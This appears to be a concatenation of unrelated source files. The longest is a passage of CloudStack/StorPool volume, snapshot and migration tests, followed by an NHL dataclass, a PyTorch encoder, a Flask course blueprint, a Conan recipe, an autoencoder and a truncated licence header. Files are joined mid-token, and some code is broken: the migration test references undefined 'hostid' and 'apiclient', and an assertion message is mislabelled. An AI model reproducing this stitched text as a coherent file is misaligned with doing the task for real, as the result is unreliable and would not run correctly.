int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_16_resize_attached_volume_on_working_vm(self): ''' Test Resize Volume Attached To Running Virtual Machine ''' self.assertEqual(VirtualMachine.RUNNING, self.virtual_machine.state, "Running") volume = self.virtual_machine.attach_volume( self.apiclient, self.volume_1 ) listvol = Volume.list( self.apiclient, id=volume.id ) name = listvol[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != listvol[0].size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id 
cmd.diskofferingid = self.disk_offering_20.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = volume.id cmd.diskofferingid = self.disk_offering_100.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) # return to small disk volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if volume.size > int((self.disk_offerings.disksize)* (1024**3)): shrinkOk= True cmd.diskofferingid = self.disk_offerings.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=volume.id ) volume = new_size[0] name = volume.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != volume.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offerings.disksize)*(1024**3))), "Could not return to Small disk" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_17_attach_detach_volume_to_stopped_vm(self): ''' Test Attach Volume To Stopped Virtual Machine ''' virtual_machine = self.virtual_machine.stop( self.apiclient, forced=True ) time.sleep(60) volume_2 = self.virtual_machine.attach_volume( self.apiclient, self.volume_2 ) list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id= volume_2.id ) name = list_vm_volumes[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) print(list_vm_volumes) self.assertEqual(volume_2.id,list_vm_volumes[0].id, "Is true") time.sleep(90) volume_2 = self.virtual_machine.detach_volume( self.apiclient, self.volume_2 ) list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id = volume_2.id ) print(list_vm_volumes) self.assertIsNone(list_vm_volumes, "Is None") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_18_resize_attached_volume(self): ''' Test Resize Volume Attached To Virtual Machine ''' shrinkOk = False if self.volume_1.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_1.id cmd.diskofferingid = self.disk_offering_20.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_1.id ) self.assertTrue( (new_size[0].size == 
int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) self.volume_1 = new_size[0] name = self.volume_1.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_1.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_1.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_1.id cmd.diskofferingid = self.disk_offering_100.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_1.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) # return to small disk self.volume_1 = new_size[0] name = self.volume_1.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_1.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_1.size > int((self.disk_offerings.disksize)* (1024**3)): shrinkOk= True cmd.diskofferingid = self.disk_offerings.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_1.id ) name = new_size[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != new_size[0].size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offerings.disksize)*(1024**3))), "Could not return to Small disk" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_19_resize_detached_volume(self): ''' Test Resize Volume Detached To Virtual Machine ''' list_vm_volumes = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, id= self.volume_2.id ) #check that the volume is not attached to VM self.assertIsNone(list_vm_volumes, "List volumes is not None") shrinkOk = False if self.volume_2.size > int((self.disk_offering_20.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_2.id cmd.diskofferingid = self.disk_offering_20.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_2.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_20.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) self.volume_2 = new_size[0] name = self.volume_2.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_2.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_2.size > int((self.disk_offering_100.disksize) * (1024**3)): shrinkOk= True cmd = resizeVolume.resizeVolumeCmd() cmd.id = self.volume_2.id cmd.diskofferingid = self.disk_offering_100.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_2.id ) self.assertTrue( (new_size[0].size == int((self.disk_offering_100.disksize) * (1024**3))), "New size is not int((self.disk_offering_20) * (1024**3)" ) # 
return to small disk self.volume_2 = new_size[0] name = self.volume_2.path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != self.volume_2.size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) shrinkOk = False if self.volume_2.size > int((self.disk_offerings.disksize)* (1024**3)): shrinkOk= True cmd.diskofferingid = self.disk_offerings.id cmd.shrinkok = shrinkOk self.apiclient.resizeVolume(cmd) new_size = Volume.list( self.apiclient, id=self.volume_2.id ) name = new_size[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) if spvolume[0].size != new_size[0].size: raise Exception("Storpool volume size is not the same as CloudStack db size") except spapi.ApiError as err: raise Exception(err) self.assertTrue( (new_size[0].size == int((self.disk_offerings.disksize)*(1024**3))), "Could not return to Small disk" ) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_20_snapshot_to_volume(self): ''' Create volume from snapshot ''' snapshot = Snapshot.create( self.apiclient, volume_id = self.volume_2.id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") volume = self.create_volume( self.apiclient, zoneid = self.zone.id, snapshotid = snapshot.id, account=self.account.name, domainid=self.account.domainid ) listvol = Volume.list( self.apiclient, id=volume.id ) name = listvol[0].path.split("/")[3] try: spvolume = self.spapi.volumeList(volumeName="~" + name) except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(volume, "Could not create volume from snapshot") self.assertIsInstance(volume, Volume, "Volume is not instance of Volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_21_snapshot_detached_volume(self): ''' Test Snapshot Detached Volume ''' self.virtual_machine.stop( self.apiclient, forced = True ) self.volume = self.virtual_machine.attach_volume( self.apiclient, self.volume ) self.assertIsNotNone(self.volume, "Attach: Is none") self.volume = self.virtual_machine.detach_volume( self.apiclient, self.volume ) self.assertIsNotNone(self.volume, "Detach: Is none") snapshot = Snapshot.create( self.apiclient, self.volume.id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Snapshot is 
None") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not Instance of Snappshot") snapshot = Snapshot.delete( snapshot, self.apiclient ) self.assertIsNone(snapshot, "Snapshot was not deleted") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_22_snapshot_root_disk(self): ''' Test ROOT Disk Snapshot ''' vm = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid = self.zone.id, templateid = self.template.id, serviceofferingid = self.service_offering.id, hypervisor = self.hypervisor, rootdisksize = 10 ) list_volumes_of_vm = list_volumes( self.apiclient, virtualmachineid = vm.id, listall = True, ) self.assertIs(len(list_volumes_of_vm), 1, "VM has more disk than 1") snapshot = Snapshot.create( self.apiclient, list_volumes_of_vm[0].id, account=self.account.name, domainid=self.account.domainid, ) try: cmd = getVolumeSnapshotDetails.getVolumeSnapshotDetailsCmd() cmd.snapshotid = snapshot.id snapshot_details = self.apiclient.getVolumeSnapshotDetails(cmd) flag = False for s in snapshot_details: if s["snapshotDetailsName"] == snapshot.id: name = s["snapshotDetailsValue"].split("/")[3] sp_snapshot = self.spapi.snapshotList(snapshotName = "~" + name) flag = True if flag == False: raise Exception("Could not find snapshot in snapshot details") except spapi.ApiError as err: raise Exception(err) self.assertIsNotNone(snapshot, "Snapshot is None") self.assertEqual(list_volumes_of_vm[0].id, snapshot.volumeid, "Snapshot is not for the same volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_23_volume_to_template(self): ''' Create Template From ROOT Volume ''' volume = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) self.virtual_machine.stop(self.apiclient) template = self.create_template_from_snapshot( self.apiclient, self.services, volumeid = volume[0].id ) virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client() self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_24_migrate_vm_to_another_storage(self): ''' Migrate VM to another Primary Storage ''' list_volumes_of_vm = list_volumes( self.apiclient, virtualmachineid = self.vm_migrate.id, listall = True, ) self.assertTrue(len(list_volumes_of_vm) == 1, "There are more volumes attached to VM") if list_volumes_of_vm[0].storageid is self.primary_storage.id: cmd = migrateVirtualMachine.migrateVirtualMachineCmd() cmd.virtualmachineid = self.vm_migrate.id if hostid: cmd.hostid = hostid vm = apiclient.migrateVirtualMachine(cmd) volume = list_volumes( self.apiclient, virtualmachineid = vm.id )[0] self.assertNotEqual(volume.storageid, self.primary_storage.id, "Could not migrate VM") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_25_migrate_volume_to_another_storage(self): ''' Migrate Volume To Another Primary Storage ''' self.assertFalse(hasattr(self.volume, 'virtualmachineid') , "Volume is not detached") self.assertFalse(hasattr(self.volume, 
'storageid') , "Volume is not detached") volume = Volume.migrate( self.apiclient, volumeid = self.volume.id, storageid = self.primary_storage2.id ) self.assertIsNotNone(volume, "Volume is None") self.assertEqual(volume.storageid, self.primary_storage2.id, "Storage is the same") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_26_create_vm_on_another_storpool_storage(self): """ Create Virtual Machine on another StorPool primary StoragePool""" virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=self.template.id, serviceofferingid=self.service_offering2.id, hypervisor=self.hypervisor, rootdisksize=10 ) self.assertIsNotNone(virtual_machine, "Could not create virtual machine on another Storpool primary storage") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_27_snapshot_to_volume_of_root_disk(self): ''' Create volume from snapshot ''' virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=self.template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) volume1 = list_volumes( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) snapshot = Snapshot.create( self.apiclient, volume_id = volume1[0].id, account=self.account.name, domainid=self.account.domainid, ) self.assertIsNotNone(snapshot, "Could not create snapshot") self.assertIsInstance(snapshot, Snapshot, "Snapshot is not an instance of Snapshot") volume = self.create_volume( self.apiclient, zoneid = self.zone.id, snapshotid = snapshot.id, account=self.account.name, domainid=self.account.domainid ) self.assertIsNotNone(volume, "Could not create volume from snapshot") self.assertIsInstance(volume, Volume, "Volume is not instance of Volume") @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_28_download_volume(self): vol = self.volume.extract( self.apiclient, volume_id = self.volume.id, zoneid = self.zone.id, mode = "HTTP_DOWNLOAD" ) self.assertIsNotNone(vol, "Volume is None") self.assertIsNotNone(vol.url, "No URL provided") Volume.delete(vol, self.apiclient) @attr(tags=["advanced", "advancedns", "smoke"], required_hardware="true") def test_29_create_vm_from_template_not_on_storpool(self): ''' Create virtual machine from template which for some reason is deleted from StorPool, but exists in template_spoool_ref DB tables ''' volume = Volume.list( self.apiclient, virtualmachineid = self.virtual_machine.id, type = "ROOT", listall = True, ) self.virtual_machine.stop(self.apiclient) template = self.create_template_from_snapshot( self.apiclient, self.services, volumeid = volume[0].id ) virtual_machine = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine.get_ssh_client(reconnect= True) name = 'ssd-' + template.id flag = False storpoolGlId = None sp_snapshots = self.spapi.snapshotsList() for snap in sp_snapshots: tags = snap.tags for t in tags: if tags[t] == template.id: storpoolGlId = snap.globalId flag = True break else: continue break if flag is False: 
try: sp_snapshot = self.spapi.snapshotList(snapshotName = name) except spapi.ApiError as err: raise Exception(err) self.spapi.snapshotDelete(snapshotName ="~" + storpoolGlId) virtual_machine2 = VirtualMachine.create(self.apiclient, {"name":"StorPool-%s" % uuid.uuid4() }, accountid=self.account.name, domainid=self.account.domainid, zoneid=self.zone.id, templateid=template.id, serviceofferingid=self.service_offering.id, hypervisor=self.hypervisor, rootdisksize=10 ) ssh_client = virtual_machine2.get_ssh_client(reconnect= True) self.assertIsNotNone(template, "Template is None") self.assertIsInstance(template, Template, "Template is instance of template") self._cleanup.append(template) @classmethod def create_volume(self, apiclient, zoneid=None, snapshotid=None, account=None, domainid=None): """Create Volume""" cmd = createVolume.createVolumeCmd() cmd.name = "Test" if zoneid: cmd.zoneid = zoneid if snapshotid: cmd.snapshotid = snapshotid if account: cmd.account=account if domainid: cmd.domainid=domainid return Volume(apiclient.createVolume(cmd).__dict__) @classmethod def get_local_cluster(cls): storpool_clusterid = subprocess.check_output(['storpool_confshow', 'CLUSTER_ID']) clusterid = storpool_clusterid.split("=") cls.debug(storpool_clusterid) clusters = list_clusters(cls.apiclient) for c in clusters: configuration = list_configurations( cls.apiclient, clusterid = c.id ) for conf in configuration: if conf.name == 'sp.cluster.id' and (conf.value in clusterid[1]): return c @classmethod def get_remote_cluster(cls): storpool_clusterid = subprocess.check_output(['storpool_confshow', 'CLUSTER_ID']) clusterid = storpool_clusterid.split("=") cls.debug(storpool_clusterid) clusters = list_clusters(cls.apiclient) for c in clusters: configuration = list_configurations( cls.apiclient, clusterid = c.id ) for conf in configuration: if conf.name == 'sp.cluster.id' and (conf.value not in clusterid[1]): return c @classmethod def list_hosts_by_cluster_id(cls, clusterid): """List all Hosts matching criteria""" cmd = listHosts.listHostsCmd() cmd.clusterid = clusterid return(cls.apiclient.listHosts(cmd)) def start(cls, vmid, hostid): """Start the instance""" cmd = startVirtualMachine.startVirtualMachineCmd() cmd.id = vmid cmd.hostid = hostid return (cls.apiclient.startVirtualMachine(cmd)) @classmethod def create_template_from_snapshot(self, apiclient, services, snapshotid=None, volumeid=None): """Create template from Volume""" # Create template from Virtual machine and Volume ID cmd = createTemplate.createTemplateCmd() cmd.displaytext = "StorPool_Template" cmd.name = "-".join(["StorPool-", random_gen()]) if "ostypeid" in services: cmd.ostypeid = services["ostypeid"] elif "ostype" in services: # Find OSTypeId from Os type sub_cmd = listOsTypes.listOsTypesCmd() sub_cmd.description = services["ostype"] ostypes = apiclient.listOsTypes(sub_cmd) if not isinstance(ostypes, list): raise Exception( "Unable to find Ostype id with desc: %s" % services["ostype"]) cmd.ostypeid = ostypes[0].id else: raise Exception( "Unable to find Ostype is required for creating template") cmd.isfeatured = True cmd.ispublic = True cmd.isextractable = False if snapshotid: cmd.snapshotid = snapshotid if volumeid: cmd.volumeid = volumeid return Template(apiclient.createTemplate(cmd).__dict__) @classmethod def getCfgFromUrl(cls, url): cfg = dict([ option.split('=') for option in url.split(';') ]) host, port = cfg['SP_API_HTTP'].split(':') auth = cfg['SP_AUTH_TOKEN'] return host, int(port), auth <filename>nhl/conference.py """ Module containing NHL 
conference objects """ from dataclasses import dataclass from .flyweight import Flyweight @dataclass(frozen=True) class Conference(Flyweight): """ NHL conference object. This is the detailed docstring. """ __slots__ = ["id", "name", "name_short", "abbreviation"] _instances = {} id: int """int: The NHL statsapi universal conference ID""" name: str """str: Conference name""" name_short: str """str: Conference name shortened""" abbreviation: str """str: Conference abbreviation""" @classmethod def _key(cls, id, *args, **kwargs): return id @classmethod def has_key(cls, id): return super().has_key(id) @classmethod def from_key(cls, id): return super().from_key(id) def __repr__(self): return "<nhl.Conference: {}, ID {}>".format(self.name, self.id) t= int(input()) while(t>0): l=list(map(int,input().split(' '))) a=l[0] b=l[1] c=pow(2,a,1000000007)-1 print(pow(c,b,1000000007)) t=t-1<gh_stars>0 import torch import torch.nn as nn from utils.utils_temp import AttrProxy class ImageEncoder(nn.Module): def __init__(self, input_channels, output_channels, conv_kernel_size, pool_kernel_size, embedding_dim, hop, dropout): super(ImageEncoder, self).__init__() self.input_channels = input_channels self.output_channels = output_channels self.conv_kernel_size = conv_kernel_size self.pool_kernel_size = pool_kernel_size self.max_hops = hop self.dropout = dropout self.dropout_layer = nn.Dropout(dropout) self.C = nn.Conv2d(input_channels, output_channels, conv_kernel_size) # need to add BN and Relu layer. self.relu = nn.ReLU() self.avgpool = nn.AdaptiveAvgPool2d(pool_kernel_size) # need to add a Flatten() layer ? self.fc = nn.Linear(2304, embedding_dim) # need to check this logic and make sure the pool_output_size. self.softmax = nn.Softmax(dim=1) def forward(self, image_arr, hidden): u = [hidden.squeeze(0)] image_arr_size = image_arr.size() batch_size = int(image_arr_size[0]) embed_A = self.C(image_arr.contiguous().view([image_arr_size[0] * image_arr_size[1]] + list(image_arr_size[2:]))) # need to check the logic clearly. embed_A = self.relu(embed_A) embed_A = self.avgpool(embed_A) embed_A = torch.flatten(embed_A, 1) embed_A = self.fc(embed_A) embed_A = embed_A.view([batch_size, int(embed_A.size()[0] / batch_size)] + list(embed_A.size()[1:])) u_temp = u[-1].unsqueeze(1).expand_as(embed_A) prob_logit = torch.sum(embed_A * u_temp, 2) prob_ = self.softmax(prob_logit) prob = prob_.unsqueeze(2).expand_as(embed_A) ret = torch.sum(embed_A * prob, 1) # ret = torch.cat((embed_A[:, 0, :], embed_A[:, 1, :]), dim=1) return retimport pytest import numpy as np @pytest.fixture def SimpleVectorValuedFunction(xs: np.ndarray): """A simple vector valued function for testing. Args: xs (np.ndarray): A 2D numpy array with argument vectors as its rows. Each vector consists of four values. Returns: np.ndarray: A 2D array with function evaluation results for each of the argument vectors on its rows. Each row contains three values. 
""" f1 = xs[:, 0] + xs[:, 1] f2 = xs[:, 1] - xs[:, 2] f3 = xs[:, 2] * xs[:, 3] return np.vstack((f1, f2, f3)).T if __name__ == "__main__": xs = np.array([[1, 2, 3, 4], [9, 8, 7, 6], [1, 5, 7, 3]]) print(SimpleVectorValuedFunction(xs)) <gh_stars>0 # -*- coding: utf-8 -*- import functools, os from flask import ( Blueprint, flash, g, redirect, render_template, request, session, url_for, json, current_app ) #from werkzeug.security import check_password_hash, generate_password_hash #from ddgatve.db import get_db bp = Blueprint('numtheory', __name__, url_prefix='/numtheory') local_tales = [ { 'id':'NumTh.ArithmProgressions', 'dir':'tale-numtheory-arithm-progressions', 'title': u'Aritmētiskas progresijas' }, { 'id':'NumTh.GeomProgressions', 'dir':'tale-numtheory-geom-progressions', 'title': u'Ģeometriskas progresijas' }, { 'id':'NumTh.PeriodicSequences', 'dir':'numtheory-recurrence-relation', 'title': u'Rekurentu virkņu periodiskums' }, { 'id':'NumTh.Grade10', 'dir':'tale-numtheory-grade10', 'title': u'10.klases mix' }, { 'id':'Comb.GamesSymmetry', 'dir':'tale-numtheory-games-symmetry', 'title': u'Simetrija spēlēs' }, { 'id':'NumTh.Multiplicative', 'dir':'tale-numtheory-multiplicative', 'title': u'Multiplikatīva teorija (pārtaisāms)', 'date': '2019-06-10' } ] global_tales = [ { 'id':'NumTh.JunIntro', 'dir':'tale-numtheory-jun-intro', 'title': u'Jun00: Ievadlekcija', 'date': '2019-09-14' }, { 'id':'NumTh.Jun01', 'dir':'tale-numtheory-jun01-divisibility', 'title': u'Jun01: Pirmskaitļi un dalāmība', 'date': '2019-09-28' }, # { # 'id':'NumTh.Jun03', # 'dir':'tale-numtheory-jun02-congruences', # 'title': u'Jun02: Modulārā aritmētika', # 'date': '2019-09-28', # 'nolink' : 'True' # }, { 'id':'NumTh.Jun02', 'dir':'tale-numtheory-jun03-crt', 'title': u'Jun02: Ķīniešu atlikumu teorēma', 'date': '2019-12-14' } # { # 'id':'NumTh.Jun04', # 'dir':'tale-numtheory-jun04-valuations', # 'title': u'Jun04: Valuācijas', # 'date': '2019-12-14', # 'nolink': 'True' # } ] exam_lst = [ { 'id':'G10.ALG', 'dir':'exam-numtheory-algebra', 'title': u'Algebras prasmes' }, { 'id':'G10.MOD', 'dir':'exam-numtheory-modular-arithmetic', 'title': u'Modulārās aritmētikas prasmes' } ] @bp.route('/index', methods=['GET', 'POST']) def index(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'my_id': 'index', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/index.html', **template_context) @bp.route('/assignments', methods=['GET','POST']) def assignments(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'my_id': 'assignments', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/assignments.html', **template_context) @bp.route('/slides', methods=['GET','POST']) def slides(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'local_tales': local_tales, 'global_tales': global_tales, 'my_id': 'slides', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/slides.html', **template_context) @bp.route('/exams', methods=['GET','POST']) def algorithms(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) 
template_context = { 'lst_comp': exam_lst, 'my_id': 'exams', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/exams.html', **template_context) @bp.route('/references', methods=['GET','POST']) def submissions(): navig_url = os.path.join(current_app.root_path, 'static/data', 'global_navigation.json') nav_items = json.load(open(navig_url, encoding='utf-8')) template_context = { 'my_id': 'references', 'course': 'numtheory', 'nav_items': nav_items } return render_template('numtheory/references.html', **template_context) <gh_stars>1-10 from conans import ConanFile, CMake, tools class LumaAvConan(ConanFile): name = "luma_av" version = "0.0.0" license = "<Put the package license here>" author = "<Put your name here> <And your email here>" url = "<Package recipe repository url here, for issues about the package>" description = "<Description of Lumaav here>" topics = ("<Put some tag here>", "<here>", "<and here>") settings = "os", "compiler", "build_type", "arch" options = {"shared": [True, False]} default_options = { "shared": False, "ffmpeg:with_opus": False, "ffmpeg:with_libalsa": False, "gtest:build_gmock": False } generators = "cmake", "cmake_find_package" exports_sources = "src/*", "test/*", "CMakeLists.txt" def requirements(self): self.requires("outcome/2.1.5") self.requires("ffmpeg/4.4") self.requires("zlib/1.2.11@conan/stable") self.requires("bzip2/1.0.8@conan/stable") self.requires("gtest/1.11.0") def build(self): cmake = CMake(self) cmake.configure() cmake.build() def package(self): self.copy("*.hpp", dst="include", src="hello") self.copy("*.so", dst="lib", keep_path=False) self.copy("*.a", dst="lib", keep_path=False) def package_info(self): self.cpp_info.libs = ["luma_av"] <reponame>eeishaan/ift6759-block2 import torch from torch import nn class CDAutoEncoder(nn.Module): r""" Convolutional denoising autoencoder layer for stacked autoencoders. This module is automatically trained when in model.training is True. Args: input_size: The number of features in the input output_size: The number of features to output stride: Stride of the convolutional layers. """ def __init__(self, input_size, output_size, stride): super(CDAutoEncoder, self).__init__() self.forward_pass = nn.Sequential( nn.Conv2d(input_size, output_size, kernel_size=2, stride=stride, padding=0), nn.ReLU(), ) self.backward_pass = nn.Sequential( nn.ConvTranspose2d(output_size, input_size, kernel_size=2, stride=stride, padding=0), nn.ReLU(), ) self.criterion = nn.MSELoss() self.optimizer = torch.optim.SGD(self.parameters(), lr=0.1) self.current_loss = 0 def forward(self, x): # Train each autoencoder individually x = x.detach() # Add noise, but use the original lossless input as the target. x_noisy = x * (x.data.new(x.size()).normal_(0, 0.1) > -.1).type_as(x) y = self.forward_pass(x_noisy) if self.training: x_reconstruct = self.backward_pass(y) x.requires_grad = False loss = self.criterion(x_reconstruct, x) self.current_loss = loss self.optimizer.zero_grad() loss.backward() self.optimizer.step() return y.detach() def reconstruct(self, x): return self.backward_pass(x) class CAES(nn.Module): r""" A stacked autoencoder made from the convolutional denoising autoencoders. Each autoencoder is trained independently and at the same time. 
""" def __init__(self): super(CAES, self).__init__() self.ae1 = CDAutoEncoder(3, 16, 2) self.ae2 = CDAutoEncoder(16, 32, 2) self.ae3 = CDAutoEncoder(32, 64, 2) self.ae4 = CDAutoEncoder(64, 32, 2) self.ae5 = CDAutoEncoder(32, 16, 2) def forward(self, x): a1 = self.ae1(x) a2 = self.ae2(a1) a3 = self.ae3(a2) a4 = self.ae4(a3) a5 = self.ae5(a4) if self.training: return a5 else: return a5, self.reconstruct(a5) def reconstruct(self, x): a4_reconstruct = self.ae5.reconstruct(x) a3_reconstruct = self.ae4.reconstruct(a4_reconstruct) a2_reconstruct = self.ae3.reconstruct(a3_reconstruct) a1_reconstruct = self.ae2.reconstruct(a2_reconstruct) x_reconstruct = self.ae1.reconstruct(a1_reconstruct) return x_reconstruct def get_loss(self): return self.ae1.current_loss + self.ae2.current_loss + self.ae3.current_loss + self.ae4.current_loss + self.ae5.current_loss def embedding(self, x): self.eval() with torch.no_grad(): embedding, _ = self.forward(x) embedding = embedding.view(embedding.shape[0], -1) self.train() return embedding.cpu().numpy() <filename>arwn/vendor/RFXtrx/pyserial.py # This file is part of pyRFXtrx, a Python library to communicate with # the RFXtrx family of devices from http://www.rfxcom.com/ # See https://github.com/woudt/pyRFXtrx for the latest version. # # Copyright (C) 2012 <NAME> <<EMAIL>> # # pyRFXtrx is free 